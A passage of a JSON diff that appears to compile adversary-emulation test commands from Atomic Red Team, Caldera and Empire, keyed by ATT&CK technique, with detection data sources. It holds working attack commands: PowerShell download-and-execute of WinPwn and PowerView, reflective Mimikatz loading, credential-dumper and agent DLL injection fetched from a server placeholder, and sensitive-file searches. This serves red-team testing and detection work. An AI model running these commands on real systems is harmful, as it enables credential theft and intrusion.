https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "name": "command_prompt", + "elevation_required": false, + "command": "gpresult /z\n" + } + }, + { + "name": "Get-DomainGPO to display group policy information via PowerView", + "auto_generated_guid": "4e524c4e-0e02-49aa-8df5-93f3f7959b9f", + "description": "Use PowerView to Get-DomainGPO This will only work on Windows 10 Enterprise and A DC Windows 2019.", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "powershell -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('https://github.com/BC-SECURITY/Empire/blob/86921fbbf4945441e2f9d9e7712c5a6e96eed0f3/empire/server/data/module_source/situational_awareness/network/powerview.ps1'); Get-DomainGPO\"", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "WinPwn - GPOAudit", + "auto_generated_guid": "bc25c04b-841e-4965-855f-d1f645d7ab73", + "description": "Check domain Group policies for common misconfigurations using Grouper2 via GPOAudit function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nGPOAudit -noninteractive -consoleoutput", + "name": "powershell" + } + }, + { + "name": "WinPwn - GPORemoteAccessPolicy", + "auto_generated_guid": "7230d01a-0a72-4bd5-9d7f-c6d472bc6a59", + "description": "Enumerate remote access policies through group policy using GPORemoteAccessPolicy function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nGPORemoteAccessPolicy -consoleoutput -noninteractive", + "name": "powershell" + } + }, + { + "name": "MSFT Get-GPO Cmdlet", + "auto_generated_guid": "52778a8f-a10b-41a4-9eae-52ddb74072bf", + "description": "The Get-GPO cmdlet gets one Group Policy Object (GPO) or all the GPOs in a domain. Tested on Windows Server 2019 as a domain user with computer joined to domain. Reference: https://docs.microsoft.com/en-us/powershell/module/grouppolicy/get-gpo?view=windowsserver2022-ps", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "gpo_output": { + "description": "The output of the Get-GPO cmdlet", + "type": "String", + "default": "$env:temp\\GPO_Output.txt" + }, + "gpo_param": { + "description": "You can specify a GPO by its display name or by its globally unique identifier (GUID) to get a single GPO, or you can get all the GPOs in the domain through the All parameter", + "type": "string", + "default": "-All" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Add Rsat.ActiveDirectory.DS", + "prereq_command": "if(Get-WindowsCapability -Online -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0 | Where-Object { $_.State -eq 'Installed' }){ exit 0 } else { exit 1 }", + "get_prereq_command": "Add-WindowsCapability -online -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0" + }, + { + "description": "Add Rsat.GroupPolicy.Management.Tools ###Two RSAT Modules needed for this to work on Win10, WinServer 2019 works by default. This will take a long time (almost 2 minutes) to install RSAT Manually###.", + "prereq_command": "if(Get-WindowsCapability -Online -Name Rsat.GroupPolicy.Management.Tools~~~~0.0.1.0 | Where-Object { $_.State -eq 'Installed' }){ exit 0 } else { exit 1 }", + "get_prereq_command": "Add-WindowsCapability -online -Name Rsat.GroupPolicy.Management.Tools~~~~0.0.1.0" + } + ], + "executor": { + "command": "Get-GPO -Domain $ENV:userdnsdomain #{gpo_param} >> #{gpo_output}", + "cleanup_command": "del $env:temp\\GPO_Output.txt -erroraction silentlycontinue", + "name": "powershell", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "T1620", + "command_list": [ + "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nmimiload -consoleoutput -noninteractive" + ], + "commands": [ + { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nmimiload -consoleoutput -noninteractive", + "source": "atomics/T1620/T1620.yaml", + "name": "Atomic Red Team Test - Reflective Code Loading" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1620", + "display_name": "Reflective Code Loading", + "atomic_tests": [ + { + "name": "WinPwn - Reflectively load Mimik@tz into memory", + "auto_generated_guid": "56b9589c-9170-4682-8c3d-33b86ecb5119", + "description": "Reflectively load Mimik@tz into memory technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\nmimiload -consoleoutput -noninteractive", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [], + "external_reference": [] + }, + { + "technique_id": "T1005", + "command_list": [ + "pip install stormssh && storm list\n", + "pip install -q stormssh 2> /dev/null && storm list | sed 's/\\x1b\\[[0-9;]*m//g'\n", + "find $(echo ~#{host.user.name}) -type f -size -500k -maxdepth 5 -exec grep -EIr -o \"\\b[A-Za-z0-9._%+-]+@#{target.org.name}\\b\" 2>/dev/null {} \\;\n", + "for directoryname in $(find /home/ -name '.git' -type d 2>/dev/null | head -5); do\n\tprintf \"$(dirname \"$directoryname\")\\n\";\ndone;\n", + "Get-ChildItem C:\\Users -Attributes Directory+Hidden -ErrorAction SilentlyContinue -Filter \".git\" -Recurse | foreach {$_.parent.FullName} | Select-Object; exit 0;\n", + "curl #{remote.host.socket}\n", + "find /Users -name '*.#{file.sensitive.extension}' -type f -not -path '*/\\.*' -size -500k 2>/dev/null | head -5\n", + "Get-ChildItem C:\\Users -Recurse -Include *.#{file.sensitive.extension} -ErrorAction 'SilentlyContinue' | foreach {$_.FullName} | Select-Object -first 5;\nexit 0;\n", + "find / -name '*.#{file.sensitive.extension}' -type f -not -path '*/\\.*' -size -500k 2>/dev/null | head -5\n", + "find $(echo ~#{host.user.name}) -type f -size -500k -maxdepth 5 -exec grep -EIr -o \"(($(echo #{domain.broadcast.ip} | cut -d. -f-2))\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\" 2>/dev/null {} \\;\n", + "powershell/collection/get_sql_column_sample_data", + "powershell/collection/get_sql_query", + "powershell/collection/minidump", + "powershell/credentials/sessiongopher", + "python/collection/osx/browser_dump", + "python/collection/osx/imessage_dump", + "python/situational_awareness/host/osx/situational_awareness" + ], + "commands": [ + { + "command": "pip install stormssh && storm list\n", + "source": "data/abilities/collection/02de522f-7e0a-4544-8afc-0c195f400f5f.yml", + "name": "Search for valid SSH commands in the config file" + }, + { + "command": "pip install -q stormssh 2> /dev/null && storm list | sed 's/\\x1b\\[[0-9;]*m//g'\n", + "source": "data/abilities/collection/02de522f-7e0a-4544-8afc-0c195f400f5f.yml", + "name": "Search for valid SSH commands in the config file" + }, + { + "command": "find $(echo ~#{host.user.name}) -type f -size -500k -maxdepth 5 -exec grep -EIr -o \"\\b[A-Za-z0-9._%+-]+@#{target.org.name}\\b\" 2>/dev/null {} \\;\n", + "source": "data/abilities/collection/1f7ff232-ebf8-42bf-a3c4-657855794cfe.yml", + "name": "Grep for all emails for the given target company" + }, + { + "command": "for directoryname in $(find /home/ -name '.git' -type d 2>/dev/null | head -5); do\n\tprintf \"$(dirname \"$directoryname\")\\n\";\ndone;\n", + "source": "data/abilities/collection/720a3356-eee1-4015-9135-0fc08f7eb2d5.yml", + "name": "This ability will locate directories that are cloned Git repositories." + }, + { + "command": "Get-ChildItem C:\\Users -Attributes Directory+Hidden -ErrorAction SilentlyContinue -Filter \".git\" -Recurse | foreach {$_.parent.FullName} | Select-Object; exit 0;\n", + "source": "data/abilities/collection/720a3356-eee1-4015-9135-0fc08f7eb2d5.yml", + "name": "This ability will locate directories that are cloned Git repositories." + }, + { + "command": "curl #{remote.host.socket}\n", + "source": "data/abilities/collection/89955f55-529d-4d58-bed4-fed9e42515ec.yml", + "name": "See the raw content of a socket" + }, + { + "command": "find /Users -name '*.#{file.sensitive.extension}' -type f -not -path '*/\\.*' -size -500k 2>/dev/null | head -5\n", + "source": "data/abilities/collection/90c2efaa-8205-480d-8bb6-61d90dbaf81b.yml", + "name": "Locate files deemed sensitive" + }, + { + "command": "Get-ChildItem C:\\Users -Recurse -Include *.#{file.sensitive.extension} -ErrorAction 'SilentlyContinue' | foreach {$_.FullName} | Select-Object -first 5;\nexit 0;\n", + "source": "data/abilities/collection/90c2efaa-8205-480d-8bb6-61d90dbaf81b.yml", + "name": "Locate files deemed sensitive" + }, + { + "command": "find / -name '*.#{file.sensitive.extension}' -type f -not -path '*/\\.*' -size -500k 2>/dev/null | head -5\n", + "source": "data/abilities/collection/90c2efaa-8205-480d-8bb6-61d90dbaf81b.yml", + "name": "Locate files deemed sensitive" + }, + { + "command": "find $(echo ~#{host.user.name}) -type f -size -500k -maxdepth 5 -exec grep -EIr -o \"(($(echo #{domain.broadcast.ip} | cut -d. -f-2))\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\" 2>/dev/null {} \\;\n", + "source": "data/abilities/collection/d69e8660-62c9-431e-87eb-8cf6bd4e35cf.yml", + "name": "Grep for IP addresses in file system per user" + }, + { + "command": "powershell/collection/get_sql_column_sample_data", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/collection/get_sql_query", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/collection/minidump", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/credentials/sessiongopher", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/collection/osx/browser_dump", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/collection/osx/imessage_dump", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "python/situational_awareness/host/osx/situational_awareness", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "id": "02de522f-7e0a-4544-8afc-0c195f400f5f", + "name": "Parse SSH config", + "description": "Search for valid SSH commands in the config file", + "tactic": "collection", + "technique": { + "attack_id": "T1005", + "name": "Data from Local System" + }, + "platforms": { + "darwin": { + "sh": { + "command": "pip install stormssh && storm list\n", + "parsers": { + "plugins.stockpile.app.parsers.ssh": [ + { + "source": "remote.ssh.cmd" + } + ] + } + } + }, + "linux": { + "sh": { + "command": "pip install -q stormssh 2> /dev/null && storm list | sed 's/\\x1b\\[[0-9;]*m//g'\n", + "parsers": { + "plugins.stockpile.app.parsers.ssh": [ + { + "source": "remote.ssh.cmd" + } + ] + } + } + } + } + }, + { + "id": "1f7ff232-ebf8-42bf-a3c4-657855794cfe", + "name": "Find company emails", + "description": "Grep for all emails for the given target company", + "tactic": "collection", + "technique": { + "attack_id": "T1005", + "name": "Data from Local System" + }, + "platforms": { + "darwin": { + "sh": { + "command": "find $(echo ~#{host.user.name}) -type f -size -500k -maxdepth 5 -exec grep -EIr -o \"\\b[A-Za-z0-9._%+-]+@#{target.org.name}\\b\" 2>/dev/null {} \\;\n" + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.user.name" + } + ] + } + ] + }, + { + "id": "720a3356-eee1-4015-9135-0fc08f7eb2d5", + "name": "Find Git Repositories", + "description": "This ability will locate directories that are cloned Git repositories.", + "tactic": "collection", + "technique": { + "attack_id": "T1005", + "name": "Data from Local System" + }, + "platforms": { + "linux": { + "sh": { + "command": "for directoryname in $(find /home/ -name '.git' -type d 2>/dev/null | head -5); do\n\tprintf \"$(dirname \"$directoryname\")\\n\";\ndone;\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.dir.git" + } + ] + } + } + }, + "windows": { + "psh,pwsh": { + "command": "Get-ChildItem C:\\Users -Attributes Directory+Hidden -ErrorAction SilentlyContinue -Filter \".git\" -Recurse | foreach {$_.parent.FullName} | Select-Object; exit 0;\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.dir.git" + } + ] + } + } + } + } + }, + { + "id": "89955f55-529d-4d58-bed4-fed9e42515ec", + "name": "cURL socket address", + "description": "See the raw content of a socket", + "tactic": "collection", + "technique": { + "attack_id": "T1005", + "name": "Data from Local System" + }, + "platforms": { + "darwin": { + "sh": { + "command": "curl #{remote.host.socket}\n" + } + }, + "linux": { + "sh": { + "command": "curl #{remote.host.socket}\n" + } + } + } + }, + { + "id": "90c2efaa-8205-480d-8bb6-61d90dbaf81b", + "name": "Find files", + "description": "Locate files deemed sensitive", + "tactic": "collection", + "technique": { + "attack_id": "T1005", + "name": "Data from Local System" + }, + "platforms": { + "darwin": { + "sh": { + "command": "find /Users -name '*.#{file.sensitive.extension}' -type f -not -path '*/\\.*' -size -500k 2>/dev/null | head -5\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.file.path", + "edge": "has_extension", + "target": "file.sensitive.extension" + } + ] + } + } + }, + "windows": { + "psh,pwsh": { + "command": "Get-ChildItem C:\\Users -Recurse -Include *.#{file.sensitive.extension} -ErrorAction 'SilentlyContinue' | foreach {$_.FullName} | Select-Object -first 5;\nexit 0;\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.file.path", + "edge": "has_extension", + "target": "file.sensitive.extension" + } + ] + } + } + }, + "linux": { + "sh": { + "command": "find / -name '*.#{file.sensitive.extension}' -type f -not -path '*/\\.*' -size -500k 2>/dev/null | head -5\n", + "parsers": { + "plugins.stockpile.app.parsers.basic": [ + { + "source": "host.file.path", + "edge": "has_extension", + "target": "file.sensitive.extension" + } + ] + } + } + } + } + }, + { + "id": "d69e8660-62c9-431e-87eb-8cf6bd4e35cf", + "name": "Find IP addresses", + "description": "Grep for IP addresses in file system per user", + "tactic": "collection", + "technique": { + "attack_id": "T1005", + "name": "Data from Local System" + }, + "platforms": { + "darwin": { + "sh": { + "command": "find $(echo ~#{host.user.name}) -type f -size -500k -maxdepth 5 -exec grep -EIr -o \"(($(echo #{domain.broadcast.ip} | cut -d. -f-2))\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\" 2>/dev/null {} \\;\n" + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.user.name" + } + ] + } + ] + }, + { + "Empire Module": "powershell/collection/get_sql_column_sample_data", + "ATT&CK Technique #1": "T1005", + "ATT&CK Technique #2": "", + "Technique": "Data from Local System", + "Concatenate for Python Dictionary": "\"powershell/collection/get_sql_column_sample_data\": [\"T1005\"]," + }, + { + "Empire Module": "powershell/collection/get_sql_query", + "ATT&CK Technique #1": "T1005", + "ATT&CK Technique #2": "", + "Technique": "Data from Local System", + "Concatenate for Python Dictionary": "\"powershell/collection/get_sql_query\": [\"T1005\"]," + }, + { + "Empire Module": "powershell/collection/minidump", + "ATT&CK Technique #1": "T1005", + "ATT&CK Technique #2": "", + "Technique": "Data from Local System", + "Concatenate for Python Dictionary": "\"powershell/collection/minidump\": [\"T1005\"]," + }, + { + "Empire Module": "powershell/credentials/sessiongopher", + "ATT&CK Technique #1": "T1005", + "ATT&CK Technique #2": "T1145", + "Technique": "Data from Local System", + "Concatenate for Python Dictionary": "\"powershell/credentials/sessiongopher\": [\"T1005\",\"T1145\"]," + }, + { + "Empire Module": "python/collection/osx/browser_dump", + "ATT&CK Technique #1": "T1005", + "ATT&CK Technique #2": "", + "Technique": "Data from Local System", + "Concatenate for Python Dictionary": "\"python/collection/osx/browser_dump\": [\"T1005\"]," + }, + { + "Empire Module": "python/collection/osx/imessage_dump", + "ATT&CK Technique #1": "T1005", + "ATT&CK Technique #2": "", + "Technique": "Data from Local System", + "Concatenate for Python Dictionary": "\"python/collection/osx/imessage_dump\": [\"T1005\"]," + }, + { + "Empire Module": "python/situational_awareness/host/osx/situational_awareness", + "ATT&CK Technique #1": "T1005", + "ATT&CK Technique #2": "T1082", + "Technique": "Data from Local System", + "Concatenate for Python Dictionary": "\"python/situational_awareness/host/osx/situational_awareness\": [\"T1005\",\"T1082\"]," + } + ], + "queries": [], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "200-500", + " 4100-4104", + "PowerShell logs" + ], + [ + "4663", + "File monitoring" + ], + [ + "5861", + "WMI" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "200-500", + " 4100-4104", + "PowerShell logs" + ], + [ + "4663", + "File monitoring" + ], + [ + "5861", + "WMI" + ], + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "user", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file access", + "description": "A file was opened or accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "file" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + } + ], + "external_reference": [ + "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf", + "https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf", + "https://www.justice.gov/opa/press-release/file/1121706/download", + "https://www.justice.gov/file/1080281/download", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/", + "https://citizenlab.org/2016/05/stealth-falcon/", + "https://s3-us-west-2.amazonaws.com/cymmetria-blog/public/Unveiling_Patchwork.pdf", + "https://www.secureworks.com/research/bronze-union", + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf", + "http://carnal0wnage.attackresearch.com/2012/09/more-on-aptsim.html", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-RAT-and-Staging-Report.pdf", + "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1055.002", + "command_list": [ + "$url=\"#{server}/file/download\";\n$wc=New-Object System.Net.WebClient;\n$wc.Headers.add(\"file\",\"debugger.dll\");\n$PBytes = $wc.DownloadData($url);\n$wc1 = New-Object System.net.webclient;\n$wc1.headers.add(\"file\",\"Invoke-ReflectivePEInjection.ps1\");\nIEX ($wc1.DownloadString($url));\nInvoke-ReflectivePEInjection -PBytes $PBytes -verbose", + "$url=\"#{server}/file/download\";\n$wc=New-Object System.Net.WebClient;\n$wc.Headers.add(\"platform\",\"windows\");\n$wc.Headers.add(\"file\",\"shared.go\");\n$wc.Headers.add(\"server\",\"#{server}\");\n$PEBytes = $wc.DownloadData($url);\n$wc1 = New-Object System.net.webclient;\n$wc1.headers.add(\"file\",\"Invoke-ReflectivePEInjection.ps1\");\nIEX ($wc1.DownloadString($url));\nInvoke-ReflectivePEInjection -verbose -PBytes $PEbytes -ProcId #{host.process.id}\n", + "$explorer = Get-Process -Name explorer;\nmavinject.exe $explorer.id C:\\Users\\Public\\sandcat.dll\n" + ], + "commands": [ + { + "command": "$url=\"#{server}/file/download\";\n$wc=New-Object System.Net.WebClient;\n$wc.Headers.add(\"file\",\"debugger.dll\");\n$PBytes = $wc.DownloadData($url);\n$wc1 = New-Object System.net.webclient;\n$wc1.headers.add(\"file\",\"Invoke-ReflectivePEInjection.ps1\");\nIEX ($wc1.DownloadString($url));\nInvoke-ReflectivePEInjection -PBytes $PBytes -verbose", + "source": "data/abilities/credential-access/c9f2c7ae-0092-4ea0-b9ae-92014eba7ce7.yml", + "name": "Injects cred dumper exe into an available process" + }, + { + "command": "$url=\"#{server}/file/download\";\n$wc=New-Object System.Net.WebClient;\n$wc.Headers.add(\"platform\",\"windows\");\n$wc.Headers.add(\"file\",\"shared.go\");\n$wc.Headers.add(\"server\",\"#{server}\");\n$PEBytes = $wc.DownloadData($url);\n$wc1 = New-Object System.net.webclient;\n$wc1.headers.add(\"file\",\"Invoke-ReflectivePEInjection.ps1\");\nIEX ($wc1.DownloadString($url));\nInvoke-ReflectivePEInjection -verbose -PBytes $PEbytes -ProcId #{host.process.id}\n", + "source": "data/abilities/defense-evasion/a398986f-31b0-436a-87e9-c8e82c028f3c.yml", + "name": "Injects sandcat DLL into an available process" + }, + { + "command": "$explorer = Get-Process -Name explorer;\nmavinject.exe $explorer.id C:\\Users\\Public\\sandcat.dll\n", + "source": "data/abilities/defense-evasion/e5bcefee-262d-4568-a261-e8a20855ec81.yml", + "name": "Leverage Mavinject (signed binary) for DLL injection" + } + ], + "parsed_datasets": [ + { + "id": "c9f2c7ae-0092-4ea0-b9ae-92014eba7ce7", + "name": "Inject Cred dumper into process (Spookier)", + "description": "Injects cred dumper exe into an available process", + "tactic": "credential-access", + "technique": { + "attack_id": "T1055.002", + "name": "Process Injection: Portable Executable Injection" + }, + "platforms": { + "windows": { + "psh": { + "command": "$url=\"#{server}/file/download\";\n$wc=New-Object System.Net.WebClient;\n$wc.Headers.add(\"file\",\"debugger.dll\");\n$PBytes = $wc.DownloadData($url);\n$wc1 = New-Object System.net.webclient;\n$wc1.headers.add(\"file\",\"Invoke-ReflectivePEInjection.ps1\");\nIEX ($wc1.DownloadString($url));\nInvoke-ReflectivePEInjection -PBytes $PBytes -verbose" + } + } + } + }, + { + "id": "a398986f-31b0-436a-87e9-c8e82c028f3c", + "name": "Inject Sandcat into process", + "description": "Injects sandcat DLL into an available process", + "tactic": "defense-evasion", + "technique": { + "attack_id": "T1055.002", + "name": "Process Injection: Portable Executable Injection" + }, + "platforms": { + "windows": { + "psh": { + "command": "$url=\"#{server}/file/download\";\n$wc=New-Object System.Net.WebClient;\n$wc.Headers.add(\"platform\",\"windows\");\n$wc.Headers.add(\"file\",\"shared.go\");\n$wc.Headers.add(\"server\",\"#{server}\");\n$PEBytes = $wc.DownloadData($url);\n$wc1 = New-Object System.net.webclient;\n$wc1.headers.add(\"file\",\"Invoke-ReflectivePEInjection.ps1\");\nIEX ($wc1.DownloadString($url));\nInvoke-ReflectivePEInjection -verbose -PBytes $PEbytes -ProcId #{host.process.id}\n" + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.paw_provenance": [ + { + "source": "host.process.id" + } + ] + } + ] + }, + { + "id": "e5bcefee-262d-4568-a261-e8a20855ec81", + "name": "Signed Binary Execution - Mavinject", + "description": "Leverage Mavinject (signed binary) for DLL injection", + "tactic": "defense-evasion", + "technique": { + "attack_id": "T1055.002", + "name": "Process Injection: Portable Executable Injection" + }, + "platforms": { + "windows": { + "psh": { + "command": "$explorer = Get-Process -Name explorer;\nmavinject.exe $explorer.id C:\\Users\\Public\\sandcat.dll\n" + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "process" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1497.003", + "command_list": [ + "sleep 60" + ], + "commands": [ + { + "command": "sleep 60", + "source": "data/abilities/defense-evasion/36eecb80-ede3-442b-8774-956e906aff02.yml", + "name": "Pause all operations to avoid making noise" + } + ], + "parsed_datasets": [ + { + "id": "36eecb80-ede3-442b-8774-956e906aff02", + "name": "1-min sleep", + "description": "Pause all operations to avoid making noise", + "tactic": "defense-evasion", + "technique": { + "attack_id": "T1497.003", + "name": "Virtualization/Sandbox Evasion: Time Based Evasion" + }, + "platforms": { + "darwin": { + "sh": { + "command": "sleep 60" + } + }, + "linux": { + "sh": { + "command": "sleep 60" + } + }, + "windows": { + "psh": { + "command": "sleep 60" + } + } + } + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": 